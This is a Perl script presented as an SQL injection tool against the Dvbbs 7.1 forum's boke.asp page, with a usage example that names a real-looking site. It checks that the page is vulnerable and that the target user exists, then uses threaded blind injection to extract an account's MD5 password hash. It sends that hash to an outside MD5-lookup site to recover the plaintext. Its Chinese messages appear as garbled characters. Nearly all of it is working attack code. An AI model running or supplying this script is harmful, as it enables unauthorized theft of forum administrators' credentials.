#use strict;
use LWP;
use LWP::Simple;
use Thread;
use HTTP::Request::Common;

print <<EOF;

£ Dvbbs 7.1 boke.asp sqlinject program
£ Usage: dv.pl http://www.xnanyang.com/bbs/boke.asp admin
£ Code : Http://hhuai.cn Huai_Huai
EOF

if($#ARGV<1)
{
exit;
}

$kk=get $ARGV[0]."?".$ARGV[1]."'.index.html";
print $kk;
if($kk=~/²©¿Í/)
{
print "²»´æÔÚ×¢È멶´£¬³ÌʽÍ˳ö!\n";
exit;
}

$kk=get $ARGV[0]."?".$ARGV[1].".index.html";
if($kk=~/²©¿Í½yÓ‹/)
{
print "´æÔÚ©¶´ºÍ´ËÓÑô£¬é_ʼ̽œy!\n";
}
elsif($kk=~/Ô“²©¿ÍÓÑô²»´æÔÚ»òÌµÄÙYÁÏÓÐÕ`/)
{
print "›]ÓдËÓÑô£¬³ÌʽÍ˳ö\n";
exit;
}
else
{
print "²»´æÔÚ×¢È멶´£¬³ÌʽÍ˳ö!\n";
exit;
}

@dic=('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

for($i=1;$i<17;$i++)
{
$url[$i]=$ARGV[0]."?".$ARGV[1]."'and'makelove'=mid(password,$i,1)and''='.index.html";
}

for($i=1;$i<17;$i++)
{
$thread[$i]=Thread->new(\&crack,$i);
}
for($i=1;$i<17;$i++)
{
$password.=$thread[$i]->join;
}
print $ARGV[1],"µÄmd5ÃÜ´ažé: $password\n";

print "é_ʼÆƽâmd5ÃÜ´a£¬ÕˆÉÔºò!\n";
my $browser = LWP::UserAgent->new;
my $ua=LWP::UserAgent->new;
$ua->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)');
my $pwd=POST('http://www.mmkey.com/md5/index.asp?action=look',
[md5text=>$password]);
my $response=$ua->request($pwd);

if($response->content=~/<input£ size="32"£ name="rr2" value="(.+)" >/)
{
print $1,"\n";
}
else
{
print "Œ¦²»Æ𣬲éÔƒ²»µ½md5ÃÜ´aÆƽâ!\n";
}

sub crack
{

my $content;
my $num=shift;
my $str=$url[$num];
foreach $md5 (@dic) {
$url[$num]=~s/makelove/$md5/;
£  $content=get $url[$num];
if($content=~/²©¿Í½yÓ‹/)
{
print "µÚ$numλžé£º$md5\n";
return $md5;
last;
}
$url[$num]=$str;
}
}